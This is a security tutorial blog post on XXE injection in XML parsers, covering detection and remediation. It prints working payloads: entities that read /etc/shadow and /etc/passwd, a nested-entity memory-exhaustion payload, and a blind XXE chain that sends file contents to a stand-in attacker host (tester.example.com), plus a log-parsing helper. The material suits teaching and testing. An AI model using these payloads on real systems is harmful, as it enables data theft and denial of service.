From:https://www.gracefulsecurity.com/xml-external-entity-injection-xxe-vulnerabilities/
Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it! XXE is a vulnerability in the way that XML parsers handle user input. If an attacker is able to enter arbitrary or crafted data into an XML parser they may be able to inject entities, and this could lead to file disclosure, denial-of-service attacks or, in rare cases, code execution!
Extensible Markup Language (XML) is a widely deployed information
exchange format. Actually, it’s a meta markup language that allows
developers to describe information as it is transferred or stored. It’s
generally both human readable and machine readable. It’s useful for data
serialisation but generally a lot bulkier than alternatives such as
JSON.
So let’s jump right in and take a look at a little XML:
XXE: Basic XML Example
<?xml version="1.0" ?>
<userInfo>
  <firstName>John</firstName>
  <lastName>Doe</lastName>
</userInfo>
The first line is the XML declaration, which states the version of XML that is being used (generally 1.0; version 1.1 exists but is rarely seen and mainly relaxes the rules on which characters are allowed). A document can also carry a Document Type Definition, or DTD, which supplies information about the document that is to follow, including any entities (we’ll talk about these in a second). The example above has no DTD yet.
The DTD is also where we can create “entities”. These are similar to variables in programming languages but a lot simpler. Essentially, an entity is where a developer can store (or retrieve) information that is used later in the document, sort of like a find-replace: everywhere the parser sees the entity used, it’ll replace it with the content the developer asked for. So utilising a simple entity for the above XML we can re-write the same document like this:
XXE: Entity Example
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
</userInfo>
Now when the document is parsed, &example; will be replaced with Doe. So entities are defined within the DTD, which is like a document header, and used in the document body in a find-replace manner. This is a really simple example of using entities to add content into an XML document, but you can even pull in file contents. This could be used to attack a vulnerable application and smuggle out sensitive data! Here’s an example:
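To see the find-replace behaviour for yourself, here is a minimal sketch that feeds the entity example to Python's standard-library ElementTree parser. The choice of Python and the helper name last_name are assumptions made for illustration; any parser that processes the internal DTD should behave the same way for this simple entity.

```python
import xml.etree.ElementTree as ET

# The "XXE: Entity Example" document, with the entity defined in the DTD.
DOCUMENT = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE replace [<!ENTITY example "Doe">]>'
    "<userInfo>"
    "<firstName>John</firstName>"
    "<lastName>&example;</lastName>"
    "</userInfo>"
)


def last_name(document: str) -> str:
    """Parse the document and return the text inside <lastName>."""
    root = ET.fromstring(document)
    return root.findtext("lastName")


# The parser has already swapped &example; for the entity's value.
print(last_name(DOCUMENT))  # Doe
```

The application never sees &example; at all, only the expanded value, which is exactly why injected entities are dangerous.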
XXE: File Disclosure
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&ent;</lastName>
</userInfo>
The above example aims to read the file that contains the password hashes on Linux. If your application is vulnerable and running with high privileges then this is bad news, as it will embed the content of the file within the XML document once it’s parsed! If the parser is only running as a lower-privileged user you could always try pulling /etc/passwd instead of /etc/shadow, as that file is world-readable. It contains usernames too, which could benefit an attacker. If the target is hosted on a Windows server, try C:\Windows\win.ini. That file doesn’t contain any sensitive data, but it’s found on every Windows server and it’s world-readable too, so it’ll prove the existence of this issue.
There are a few simple ways that an attacker can cause a denial-of-service against a vulnerable XML parser. A simple method is to attempt to read a data stream instead of a file, such as trying to disclose the contents of /dev/zero or /dev/urandom on a Linux system. This will supply a constant stream of data to the parser and tie up all of its resources.
Further to the above there is also the idea of entity unpacking, which is performed through the use of nested entities. An attacker defines entities in the DTD that each contain multiple references to other entities. The parser then recursively unpacks all of these references, and this can use a large amount of memory as the string grows exponentially with each level of nesting. If an attacker can craft an entity that uses all of the system memory, a denial-of-service can be caused as the system may run out of memory and crash!
XXE: Denial-of-service Example
<?xml version="1.0" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Whilst this may at first seem innocuous, the reference to &lol9; within the element at the bottom expands to seven copies of &lol8;, each of which expands to seven copies of &lol7;, and so on down to &lol1;, which is itself seven “lols” long. Each level makes the string seven times longer again, until it becomes unmanageably long!
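To put a number on that growth, here is a small worked calculation. It assumes the payload as shown above, with seven references per entity and nine levels of nesting; the function names are made up for this sketch.

```python
def expanded_copies(fanout: int, depth: int) -> int:
    """Number of base strings produced by `depth` levels of nesting,
    where every entity references the level below `fanout` times."""
    return fanout ** depth


def expanded_chars(base: str, fanout: int, depth: int) -> int:
    """Total characters in the fully expanded top-level entity."""
    return len(base) * expanded_copies(fanout, depth)


# Seven references per level, nine levels (lol1 .. lol9), base string "lol".
print(expanded_copies(7, 9))        # 40353607 copies of "lol"
print(expanded_chars("lol", 7, 9))  # 121060821 characters

# With ten references per level the same nine levels give a billion copies.
print(expanded_copies(10, 9))       # 1000000000
```

So a payload of well under a kilobyte asks the parser to build a string of roughly 121 million characters, and adding a level or widening each entity multiplies that again.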
XXE: Detecting Vulnerable Parsers
So finding this vulnerability on your systems is fairly simple. The conditions that are supposed to be fulfilled for a system to be vulnerable are the ability for the attacker to write into the DTD and for External Entities to be enabled (they are enabled by default on many parsers). However, the author has seen implementations that didn’t follow the standards, where an attacker could define entities outside of the DTD! So a better method to detect this issue is to utilise the “XXE: Entity Example” as a test payload. If the system parses this payload and replaces the entity with the string given in the entity definition, then defining entities is possible, so one criterion is met. To test for the second criterion, modify your test payload so that it’s like the example given in “XXE: File Disclosure” and attempt to locate some known files (/etc/passwd and C:\Windows\win.ini are good options). If you see the content of the file within your parsed XML output then the system is vulnerable!
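The first check can be sketched as a small helper. This is only an illustration under stated assumptions: the function names and the marker strings are invented here, and sending the payload to the target is left out because it depends entirely on the application under test. The marker is split across two entities so that the joined string never appears in the payload itself; if the application simply echoes the raw XML back, the check will not be fooled.

```python
import xml.etree.ElementTree as ET


def build_entity_probe(first_half: str = "xxe", second_half: str = "probe"):
    """Return (payload, expected) for the entity-expansion test.

    `expected` only exists once a parser has expanded both entities,
    so seeing it in a response means entities were processed.
    """
    expected = first_half + second_half
    payload = (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE replace [<!ENTITY a "{first_half}">'
        f'<!ENTITY b "{second_half}">]>'
        "<userInfo><firstName>John</firstName>"
        "<lastName>&a;&b;</lastName></userInfo>"
    )
    return payload, expected


def entities_were_expanded(response_body: str, expected: str) -> bool:
    """True if the application's output contains the joined marker."""
    return expected in response_body


payload, expected = build_entity_probe()

# Stand-in for a vulnerable application: parse and echo back the last name.
echoed = ET.fromstring(payload).findtext("lastName")
print(entities_were_expanded(echoed, expected))   # True
print(entities_were_expanded(payload, expected))  # False
```

The second check follows the same shape: swap the entity definition for a SYSTEM entity pointing at a known file and look for that file's contents in the output.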
Update: Blind XXE
I’ve seen it documented a few times that it’s only possible to exploit XML External Entity Injection if the entity is reflected back in the application at some point. However, that’s not true, and I’ve personally exploited blind injection. It’s a touch awkward but pretty simple: an attacker can leverage Parameter Entities to dynamically build a URL and request it. That way it’s possible to load the contents of a file and append it to a URL pointing to a server controlled by the attacker, effectively delivering the file contents to that server! All this without anything needing to be displayed within the application itself.
This attack comes in two parts. The first is similar to the file disclosure proof-of-concept above, however you’ll notice that it uses a parameter entity (PE) to load a remote file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ENTITY % pe SYSTEM "http://tester.example.com/xxe_file">
  %pe;
  %param1;
]>
<foo>&external;</foo>
That file should contain the following:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://tester.example.com/log_xxe?data=%payload;'>">
So if we break this attack down, first of all the payload itself loads, in the DTD, the file xxe_file, which should be stored on an attacker-controlled server. The file then instructs the XML parser to first load the contents of the file /etc/passwd (which contains system usernames on Linux and is world-readable; try something like C:\Windows\win.ini on Windows). The parser takes the contents and appends them to the end of a URL pointing at an attacker-controlled website. The file log_xxe doesn’t actually have to exist, as the web server will log the GET request for the file either way!
So an attacker places the entity in the vulnerable application, and the parser loads the xxe_file and dynamically builds a URL that contains the contents of the target file. It sends that request (including the target file) to the attacker’s web server, where they can simply pull the stolen file contents out of the server logs! All blind, no need for contents to be displayed in the application itself!
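Pulling the data back out of the logs is just a matter of reading the query string of the logged request. Here is a rough sketch, assuming the logged request target looks like the log_xxe URL above; the function name and the sample log entry are invented for illustration.

```python
from urllib.parse import parse_qs, urlsplit


def exfiltrated_data(request_target: str, param: str = "data"):
    """Return the decoded value of `param` from a logged request target,
    or None if the parameter is not present."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


# A made-up log entry: the path and query string of the incoming GET request.
print(exfiltrated_data("/log_xxe?data=root%3Ax%3A0%3A0"))  # root:x:0:0
print(exfiltrated_data("/favicon.ico"))                    # None
```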
Remediation
So how do we fix this issue? Luckily the fix can be pretty straightforward: if External Entities aren’t required then disable them! If that’s not possible then sanitization of user input is the next option, that is, to encode user input in such a way that entities cannot be defined through it. In this case the recommendation would be to take dangerous characters (&, <, >, ” and ; would be a good place to start) and HTML Entity encode them as they are processed and displayed. This shouldn’t have any effect on legitimate users who wish to use these characters, as they’ll still render correctly in a browser, but any attacker trying to use these characters to attack your applications will be unable to!
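Both fixes can be sketched with Python's standard library. Treat this as an illustration rather than a drop-in fix: every parser has its own switch for external entities, so check the documentation for the one you actually use. The class and function names here are made up for the sketch, and the example covers only the external-entity switch, not entity expansion limits.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.saxutils import escape


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(document: bytes) -> str:
    """Parse with external general entities switched off and return the text."""
    parser = xml.sax.make_parser()
    # Fix 1: tell the parser not to fetch external general entities.
    parser.setFeature(feature_external_ges, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return "".join(handler.chunks)


def encode_user_input(value: str) -> str:
    """Fix 2: encode &, <, > and double quotes before the value goes into XML."""
    return escape(value, {'"': "&quot;"})


ATTACK = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd">]>'
    b"<userInfo><firstName>John</firstName>"
    b"<lastName>&ent;</lastName></userInfo>"
)

# The external entity is never fetched, so no file contents appear here.
print(parse_without_external_entities(ATTACK))
print(encode_user_input('&ent; <b>"'))  # &amp;ent; &lt;b&gt;&quot;
```

Disabling the feature in the parser is the stronger of the two, since it does not rely on every input path being encoded correctly.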